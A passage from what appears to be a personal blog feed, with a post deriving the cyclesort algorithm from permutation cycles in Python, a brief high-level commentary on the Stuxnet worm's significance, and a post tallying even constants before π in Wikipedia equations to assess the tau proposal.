style="color: #005CC5;"> 4</span><span>]</span></span></code></pre><h2 id="permutations">Permutations</h2> <p>Now, it's a fascinating fact that <strong>any permutation can be decomposed into a unique set of disjoint cycles</strong>. We can think of this as analogous to the factorization of a number - every permutation is the product a unique set of component cycles in the same way every number is the product of a unique set of prime factors. Taking this as a given, how could we calculate the cycles that make up a permutation? One obvious way to proceed is to pick a starting point, and simply "follow" the cycle in reverse until we get back to where we started. We know from the result above that the element is guaranteed to be part of a cycle, so we must eventually reach our starting point again. When we do, hey presto, we have a complete cycle. If we keep track of the elements that are already part of a known cycle, we can skip to the next unknown element and repeat the process. Once we reach the end of the list we're done.</p> <p>This scheme can only work if we know where in the ordered sequence any given element belongs, because this is the way we find the "previous hop" in a cycle. In the examples above, we worked with lists that consist of a contiguous range of numbers <strong>0..n</strong>, which gives us a short-cut: the element's value <em>is</em> its offset in the ordered list. In the code below I've factored this out into a function <strong>key</strong>, which takes an element value, and returns its correct offset - in this case <strong>key</strong> is simply the identity function.</p> <p>Here's a Python function that finds all cycles in permutations of numbers ranging from <strong>0..n</strong>:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> key</span><span>(element):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> element</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> find_cycles</span><span>(l):</span></span> <span class="giallo-l"><span> seen</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> set</span><span>()</span></span> <span class="giallo-l"><span> cycles</span><span style="color: #D73A49;"> =</span><span> []</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> i</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> range</span><span>(</span><span style="color: #005CC5;">len</span><span>(l)):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> i</span><span style="color: #D73A49;"> !=</span><span> key(l[i])</span><span style="color: #D73A49;"> and not</span><span> i</span><span style="color: #D73A49;"> in</span><span> seen:</span></span> <span class="giallo-l"><span> cycle</span><span style="color: #D73A49;"> =</span><span> []</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> i</span></span> <span class="giallo-l"><span style="color: #D73A49;"> while</span><span style="color: #005CC5;"> 1</span><span>:</span></span> <span class="giallo-l"><span> cycle.append(n)</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> key(l[n])</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> ==</span><span> i:</span></span> <span class="giallo-l"><span style="color: #D73A49;"> break</span></span> <span class="giallo-l"><span> seen</span><span style="color: #D73A49;"> =</span><span> seen.union(</span><span style="color: #005CC5;">set</span><span>(cycle))</span></span> <span class="giallo-l"><span> cycles.append(</span><span style="color: #005CC5;">list</span><span>(</span><span style="color: #005CC5;">reversed</span><span>(cycle)))</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> cycles</span></span></code></pre> <p>Running it on our example permutation produces the cycle we used to produce it:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> find_cycles([</span><span style="color: #005CC5;">1</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 2</span><span>,</span><span style="color: #005CC5;"> 0</span><span>,</span><span style="color: #005CC5;"> 4</span><span>])</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> [[</span><span style="color: #005CC5;">3</span><span>,</span><span style="color: #005CC5;"> 1</span><span>,</span><span style="color: #005CC5;"> 0</span><span>]]</span></span></code></pre> <p>Here's <strong>find_cycles</strong> run on a longer, randomly shuffled list:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span>l</span><span style="color: #D73A49;"> =</span><span> [</span><span style="color: #005CC5;">0</span><span>,</span><span style="color: #005CC5;"> 5</span><span>,</span><span style="color: #005CC5;"> 6</span><span>,</span><span style="color: #005CC5;"> 8</span><span>,</span><span style="color: #005CC5;"> 7</span><span>,</span><span style="color: #005CC5;"> 4</span><span>,</span><span style="color: #005CC5;"> 9</span><span>,</span><span style="color: #005CC5;"> 1</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 2</span><span>]</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> find_cycles(l)</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> [[</span><span style="color: #005CC5;">7</span><span>,</span><span style="color: #005CC5;"> 4</span><span>,</span><span style="color: #005CC5;"> 5</span><span>,</span><span style="color: #005CC5;"> 1</span><span>], [</span><span style="color: #005CC5;">9</span><span>,</span><span style="color: #005CC5;"> 6</span><span>,</span><span style="color: #005CC5;"> 2</span><span>], [</span><span style="color: #005CC5;">8</span><span>,</span><span style="color: #005CC5;"> 3</span><span>]]</span></span></code></pre> <p>And here's a handsomely colourful graphical version of the output above:</p> <div class="media"> <a href="graph2.png"> <img src="graph2.png" /> </a> </div><h2 id="a-sorting-algorithm-emerges">A sorting algorithm emerges</h2> <p>Let's take a closer look at the <strong>find_cycles</strong> function above. We keep track of elements that are already part of a cycle in the <strong>seen</strong> set, so that we can skip them as we proceed through the list. The <strong>seen</strong> set can be as large as the list itself, so we've doubled the memory requirement for the algorithm. If we're allowed to destroy the input list, we can avoid explicitly tracking seen elements by relocating elements to their correct position as we work our way around each cycle. All the cycles are disjoint and we traverse each cycle only once, so doing this won't affect the function's output. We can then tell that we need to skip an element we've already seen by checking whether it's in the correct sorted position. Here's the result:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> key</span><span>(element):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> element</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> find_cycles2</span><span>(l):</span></span> <span class="giallo-l"><span> cycles</span><span style="color: #D73A49;"> =</span><span> []</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> i</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> range</span><span>(</span><span style="color: #005CC5;">len</span><span>(l)):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> i</span><span style="color: #D73A49;"> !=</span><span> key(l[i]):</span></span> <span class="giallo-l"><span> cycle</span><span style="color: #D73A49;"> =</span><span> []</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> i</span></span> <span class="giallo-l"><span style="color: #D73A49;"> while</span><span style="color: #005CC5;"> 1</span><span>:</span></span> <span class="giallo-l"><span> cycle.append(n)</span></span> <span class="giallo-l"><span> tmp</span><span style="color: #D73A49;"> =</span><span> l[n]</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> !=</span><span> i:</span></span> <span class="giallo-l"><span> l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span> <span class="giallo-l"><span> last_value</span><span style="color: #D73A49;"> =</span><span> tmp</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> key(last_value)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> ==</span><span> i:</span></span> <span class="giallo-l"><span> l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span> <span class="giallo-l"><span style="color: #D73A49;"> break</span></span> <span class="giallo-l"><span> cycles.append(</span><span style="color: #005CC5;">list</span><span>(</span><span style="color: #005CC5;">reversed</span><span>(cycle)))</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> cycles</span></span></code></pre> <p>But... at the end of this process, the original list is sorted! Tada: cyclesort pops out of the shrubbery almost as a side-effect of efficiently finding all cycles. If we're only interested in sorting, we can strip the code that saves the cycles, which leaves us with a nice, pared-back sorting algorithm:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> key</span><span>(element):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> element</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> cyclesort_simple</span><span>(l):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> i</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> range</span><span>(</span><span style="color: #005CC5;">len</span><span>(l)):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> i</span><span style="color: #D73A49;"> !=</span><span> key(l[i]):</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> i</span></span> <span class="giallo-l"><span style="color: #D73A49;"> while</span><span style="color: #005CC5;"> 1</span><span>:</span></span> <span class="giallo-l"><span> tmp</span><span style="color: #D73A49;"> =</span><span> l[n]</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> !=</span><span> i:</span></span> <span class="giallo-l"><span> l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span> <span class="giallo-l"><span> last_value</span><span style="color: #D73A49;"> =</span><span> tmp</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> key(last_value)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> ==</span><span> i:</span></span> <span class="giallo-l"><span> l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span> <span class="giallo-l"><span style="color: #D73A49;"> break</span></span></code></pre> <p>The <strong>cyclesort_simple</strong> algorithm only works on permutations of sets of numbers ranging from <strong>0</strong> to <strong>n</strong>. There are other fast ways to sort data of this restricted kind, but all the methods I know of require additional memory proportional to <strong>n</strong>. Cyclesort can do it without any extra storage at all, which is a neat trick.</p> <h2 id="visualising-cyclesort">Visualising cyclesort</h2> <p>At this point, we have enough information to visualise the algorithm, so let's take a look at the beastie we're working with. I've had to make some little adjustments to the usual sortvis.org visualisation process to cope with cyclesort. In the algorithm above, the first element is duplicated into the second position of each cycle, and that duplicate remains in play until it's over-written by the last element of the cycle. I changed the algorithm slightly to write a null placeholder at the start of the cycle to avoid duplicates, and taught the sortvis.org visualiser to deal with "empty" slots. The resulting <a rel="external" href="http://sortvis.org/visualisations.html">weave</a> visualisation looks like this:</p> <div class="media"> <a href="cyclesort.png"> <img src="cyclesort.png" /> </a> </div> <p>This is quite satisfying - you can tell where each cycle begins and ends by the gaps, which span each cycle exactly. It's immediately clear that the permutation above, for instance, contained five cycles. Within each cycle, you can follow along as each element replaces the next, until we finally close the gap by placing the last element in the first slot.</p> <p>The <a rel="external" href="http://sortvis.org/visualisations.html">dense</a> visualisation is less informative because the gaps are too small to see at a single-pixel width, and the algorithm doesn't have much other large-scale structure. It still looks neat, though:</p> <div class="media"> <a href="cyclesort-dense.png"> <img src="cyclesort-dense.png" /> </a> </div><h2 id="generalising-cyclesort">Generalising cyclesort</h2> <p>Cyclesort works whenever we can write an implementation of the <strong>key</strong> function, so there's quite a bit of scope for clever exploitation of structured data. The Haddon paper presents a solution for one common case: permutations whose elements come from a relatively small set, where the number of occurances of each element is known. The insight is that the <strong>key</strong> function can have persistent state, letting us calculate the positions of elements incrementally as we work through the list.</p> <p>We begin by adding an extra argument to our sort function: a list <strong>(element, count)</strong> tuples telling us a) the order of the keys, and b) the frequency with which each key occurs.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span>[(</span><span style="color: #032F62;">&quot;a&quot;</span><span>,</span><span style="color: #005CC5;"> 10</span><span>), (</span><span style="color: #032F62;">&quot;b&quot;</span><span>,</span><span style="color: #005CC5;"> 33</span><span>), (</span><span style="color: #032F62;">&quot;c&quot;</span><span>,</span><span style="color: #005CC5;"> 18</span><span>), (</span><span style="color: #032F62;">&quot;d&quot;</span><span>,</span><span style="color: #005CC5;"> 41</span><span>)]</span></span></code></pre> <p>Now, in the sorted list, we know that there will be a contiguous blog of 10 "a"s, followed by a contiguous block of 33 "b"s, and so forth. We can use this information to calculate the offset of each contiguous block up front:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> offsets</span><span>(keys):</span></span> <span class="giallo-l"><span> d</span><span style="color: #D73A49;"> =</span><span> {}</span></span> <span class="giallo-l"><span> offset</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> 0</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> key, occurences</span><span style="color: #D73A49;"> in</span><span> keys:</span></span> <span class="giallo-l"><span> d[key]</span><span style="color: #D73A49;"> =</span><span> offset</span></span> <span class="giallo-l"><span> offset</span><span style="color: #D73A49;"> +=</span><span> occurences</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> d</span></span></code></pre> <p>The <strong>key</strong> function uses this offset dictionary to look up the current index for any element. Each time we insert an element into position, we increment the relevant offset entry - next time we get to an element of the same type, we will place it in the next position in the contiguous block. We also make a small modification to the algorithm to cater for the progressive position increment process: we start a cycle only when the element is equal to or above the position where it ought to be. Here's a Python implementation:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> offsets</span><span>(keys):</span></span> <span class="giallo-l"><span> d</span><span style="color: #D73A49;"> =</span><span> {}</span></span> <span class="giallo-l"><span> offset</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> 0</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> key, occurences</span><span style="color: #D73A49;"> in</span><span> keys:</span></span> <span class="giallo-l"><span> d[key]</span><span style="color: #D73A49;"> =</span><span> offset</span></span> <span class="giallo-l"><span> offset</span><span style="color: #D73A49;"> +=</span><span> occurences</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> d</span></span> <span class="giallo-l"></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> key</span><span>(o, element):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> o[element]</span></span> <span class="giallo-l"></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> cyclesort_general</span><span>(l, keys):</span></span> <span class="giallo-l"><span> o</span><span style="color: #D73A49;"> =</span><span> offsets(keys)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> i</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> range</span><span>(</span><span style="color: #005CC5;">len</span><span>(l)):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> i</span><span style="color: #D73A49;"> &gt;=</span><span> key(o, l[i]):</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> i</span></span> <span class="giallo-l"><span style="color: #D73A49;"> while</span><span style="color: #005CC5;"> 1</span><span>:</span></span> <span class="giallo-l"><span> tmp</span><span style="color: #D73A49;"> =</span><span> l[n]</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> !=</span><span> i:</span></span> <span class="giallo-l"><span> l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span> <span class="giallo-l"><span> last_value</span><span style="color: #D73A49;"> =</span><span> tmp</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> key(o, last_value)</span></span> <span class="giallo-l"><span> o[last_value]</span><span style="color: #D73A49;"> +=</span><span style="color: #005CC5;"> 1</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> ==</span><span> i:</span></span> <span class="giallo-l"><span> l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span> <span class="giallo-l"><span style="color: #D73A49;"> break</span></span></code></pre> <p>This algorithm runs in <strong>O(n + m)</strong>, where <strong>n</strong> is the number of elements and <strong>m</strong> is the number of distinct element values. In practice <strong>m</strong> is usually small, so this is often tantamount to being <strong>O(n)</strong>.</p> <h2 id="the-code">The code</h2> <p>As usual, the code for these visualisations have been incorporated into the <a rel="external" href="https://github.com/cortesi/sortvis">sortvis project</a>. I've also added the visualisations above to the <a rel="external" href="http://sortvis.org">sortvis.org</a> website.</p> What Stuxnet means 2010-11-15T00:00:00+00:00 2010-11-15T00:00:00+00:00 https://corte.si/posts/security/stuxnet/ <p><a rel="external" href="http://www.symantec.com/connect/blogs/stuxnet-breakthrough">The last bit of evidence is now in</a> - it appears that the mysterious <a rel="external" href="http://en.wikipedia.org/wiki/Stuxnet">Stuxnet</a> worm was indeed aimed at Iran's nuclear capability. This means that we now know for sure that Stuxnet was an event of great significance - the first example of a type of sophisticated interstate warfare that we can expect to see a lot more of in future. It neatly ties together a number of trends that we've been talking about to clients at <a rel="external" href="http://www.nullcube.com">Nullcube</a> for years:</p> <ul> <li><strong>The worm as a targeted delivery platform.</strong> Stuxnet spread indiscriminately, waiting until it infected its intended target before springing into action. This is a marvelous delivery platform with excellent deniability. When executed with flair - using multiple previously unknown vulnerabilities, spreading through both physical media and networks - it can be incredibly hard to defend against. Look for a Stuxnet-like worm that exfiltrates data from targeted systems next.</li> <li><strong>Internet security is a national concern.</strong> There's a tendency to view the Internet as an internationally homogeneous network. Stuxnet makes it (even more) clear that the Internet is a domain for contest between nation states, and that national differences in security readiness and technology populations matter. Look for more direct government involvement in tracking and improving the security of local networks. I suspect we'll also see the rise of national perimeter defenses in some countries in the next few years.</li> <li><strong>Embedded systems are a target.</strong> Embedded systems are everywhere, are often ignored when security is considered, and are opaque, difficult to inspect, and difficult to monitor. This is a malware nirvana. Whether they are directly or indirectly connected to a network, embedded systems are a target. My prediction: soon, we'll see a Stuxnet-like worm that spreads directly from embedded system to embedded system, most likely affecting DSL modems. In fact, we've already seen a clumsy precursor of this in <a rel="external" href="http://en.wikipedia.org/wiki/Psyb0t">Psyb0t</a>, discovered at the beginning of 2009.</li> </ul> <p>There's a lot about this incident that we will most likely never know. We're unlikely to find out who's behind Stuxnet (although Israel and the US seem to be the only real possibilities). We're unlikely to find out if Stuxnet ever repayed the immense technological capital its creators invested. But we do know that it's a sign of things to come.</p> Tau: is it worth switching? 2010-10-04T00:00:00+00:00 2010-10-04T00:00:00+00:00 https://corte.si/posts/maths/tau/ <p>The mailing list for my <a rel="external" href="http://dunedin.linux.net.nz/Main/HomePage">local LUG</a> recently had a small flurry of posts on <a rel="external" href="http://www.tauday.com/">The Tau Manifesto</a>, a proposal to replace of the constant π with τ, equal to 2π. Pro- and anti- camps quickly emerged, and much beer will likely be spilt over the issue at our next meeting.</p> <p>Disregarding for the moment any conceptual elegance or expanatory power that Tau might have, I was interested to know if the move would really reduce redundancy in common mathematical expressions. Lets say (rather arbitrarily) that Tau simplifies a mathematical expression whenever π is preceded by an even constant - that means that 2π becomes τ, and 4π becomes 2τ, and so forth. I had a vague intuition that the majority of occurances of π in the wild fell into this category, which might indicate that τ is a more natural (or at least parsimonious) constant to use. Was my hunch right? This, I felt, was something I could quantify.</p> <h2 id="methodology">Methodology</h2> <p>I wrote a small script to crawl all the articles linked to from the Wikipedia <a rel="external" href="http://en.wikipedia.org/wiki/List_of_equations">List of Equations</a> page. For each page, I extracted all mathematical expressions, and checked the LaTeX source of each for occurances of the symbol π. A little bit of light parsing was then done to check if the symbol was directly preceded by an integer constant. Finally, I rendered the LaTeX source back to images to produce the equation tables below.</p> <p>Of course, anyone of sound judgement will disregard what follows entirely, due to the many obvious shortcomings of this procedure and its underlying assumptions. Readers of my blog, on the other hand, may find the results interesting.</p> <h2 id="results">Results</h2> <p>I found a total of 3173 equations, of which 133 contained the symbol π. Of these 133 equations, the distribution of constant factors preceding π looked like this:</p> <div class="media"> <a href="taugraph.png"> <img src="taugraph.png" /> </a> </div> <p>I call this a straight win for Tau - the vast majority of expressions using π (119 of 133) are preceded by even integer constants.</p> <h2 id="equations">Equations</h2> <p>Below are all the expressions that included π, plus the detected constant factor. The headings point to the Wikipedia pages from which the equations were taken.</p> <p>If nothing else, this list is a nice reminder of the mysterious ubiquity of a constant involving the diameter and circumference of a circle in all aspects of physics and higher math.</p> <h2><a href="http://en.wikipedia.org/wiki/Relativistic_wave_equations">Relativistic wave equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="1.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Sine-Gordon_equation">Sine-Gordon equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="2.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="3.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Fokker%E2%80%93Planck_equation">Fokker–Planck equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="4.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="5.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="6.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="7.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Euler%27s_equation">Euler&#39;s equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="8.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Friedmann_equations">Friedmann equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="9.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="10.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="11.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="12.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="13.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="14.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="15.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="16.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="17.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="18.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Vlasov_equation">Vlasov equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="19.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="20.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="21.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Screened_Poisson_equation">Screened Poisson equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="22.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="23.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="24.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="25.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="26.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Quadratic_equation">Quadratic equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="27.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="28.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Stokes-Einstein_relation">Stokes-Einstein relation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">6</td> <td> <img src="29.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">6</td> <td> <img src="30.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">6</td> <td> <img src="31.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Fisher_equation">Fisher equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="32.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="33.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_odd">None</td> <td> <img src="34.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="35.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Einstein%27s_field_equation">Einstein&#39;s field equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="36.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="37.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="38.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="39.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="40.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="41.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="42.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="43.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="44.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="45.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="46.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="47.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="48.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="49.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="50.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="51.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="52.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Sackur-Tetrode_equation">Sackur-Tetrode equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="53.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Laplace%27s_equation">Laplace&#39;s equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="54.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="55.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="56.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="57.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="58.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="59.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="60.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Cauchy-Riemann_equations">Cauchy-Riemann equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="61.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Cubic_equation">Cubic equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="62.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="63.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="64.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="65.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="66.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Partial_differential_equation">Partial differential equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="67.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="68.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="69.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="70.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="71.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="72.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="73.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Lane-Emden_equation">Lane-Emden equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img 